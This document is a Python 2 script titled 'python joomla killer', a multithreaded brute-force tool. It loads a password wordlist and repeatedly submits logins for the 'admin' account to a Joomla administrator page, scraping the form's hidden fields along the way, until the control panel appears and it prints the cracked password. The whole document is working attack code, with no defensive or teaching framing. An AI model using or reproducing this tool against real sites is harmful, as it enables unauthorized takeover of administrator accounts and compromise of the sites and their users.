python joomla killer

1. import urllib2
2. import urllib
3. import cookielib
4. import threading
5. import sys
6. import Queue
7.  
8. from HTMLParser import HTMLParser
9.  
10. # general settings
11. user_thread   = 10
12. username      = "admin"
13. wordlist_file = "/tmp/cain.txt"
14. resume        = None
15.  
16. # target specific settings
17. target_url    = "http://192.168.112.131/administrator/index.php"
18. target_post   = "http://192.168.112.131/administrator/index.php"
19.  
20. username_field= "username"
21. password_field= "passwd"
22.  
23. success_check = "Administration - Control Panel"
24.  
25.  
26. class BruteParser(HTMLParser):
27.    
28.     def __init__(self):
29.         HTMLParser.__init__(self)
30.         self.tag_results = {}
31.        
32.     def handle_starttag(self, tag, attrs):
33.         if tag == "input":
34.             tag_name  = None
35.             tag_value = None
36.             for name,value in attrs:
37.                 if name == "name":
38.                     tag_name = value
39.                 if name == "value":
40.                     tag_value = value
41.            
42.             if tag_name is not None:
43.                 self.tag_results[tag_name] = value
44.  
45.  
46. class Bruter(object):
47.     def __init__(self, username, words):
48.        
49.         self.username   = username
50.         self.password_q = words
51.         self.found      = False
52.        
53.         print "Finished setting up for: %s" % username
54.        
55.     def run_bruteforce(self):
56.        
57.         for i in range(user_thread):
58.             t = threading.Thread(target=self.web_bruter)
59.             t.start()
60.    
61.     def web_bruter(self):
62.        
63.         while not self.password_q.empty() and not self.found:
64.             brute = self.password_q.get().rstrip()
65.             jar = cookielib.FileCookieJar("cookies")
66.             opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(jar))
67.            
68.             response = opener.open(target_url)
69.            
70.             page = response.read()
71.            
72.             print "Trying: %s : %s (%d left)" % (self.username,brute,self.password_q.qsize())
73.  
74.             # parse out the hidden fields
75.             parser = BruteParser()
76.             parser.feed(page)    
77.            
78.             post_tags = parser.tag_results
79.            
80.             # add our username and password fields
81.             post_tags[username_field] = self.username
82.             post_tags[password_field] = brute
83.            
84.             login_data = urllib.urlencode(post_tags)
85.             login_response = opener.open(target_post, login_data)
86.            
87.             login_result = login_response.read()
88.            
89.            
90.             if success_check in login_result:
91.                 self.found = True
92.                
93.                 print "[*] Bruteforce successful."
94.                 print "[*] Username: %s" % username
95.                 print "[*] Password: %s" % brute
96.                 print "[*] Waiting for other threads to exit..."
97.  
98. def build_wordlist(wordlist_file):
99.  
100.     # read in the word list
101.     fd = open(wordlist_file,"rb")
102.     raw_words = fd.readlines()
103.     fd.close()
104.    
105.     found_resume = False
106.     words        = Queue.Queue()
107.    
108.     for word in raw_words:
109.        
110.         word = word.rstrip()
111.        
112.         if resume is not None:
113.            
114.             if found_resume:
115.                 words.put(word)
116.             else:
117.                 if word == resume:
118.                     found_resume = True
119.                     print "Resuming wordlist from: %s" % resume
120.                                        
121.         else:
122.             words.put(word)
123.    
124.     return words            
125.  
126. words = build_wordlist(wordlist_file)
127.  
128.  
129. bruter_obj = Bruter(username,words)
130. bruter_obj.run_bruteforce()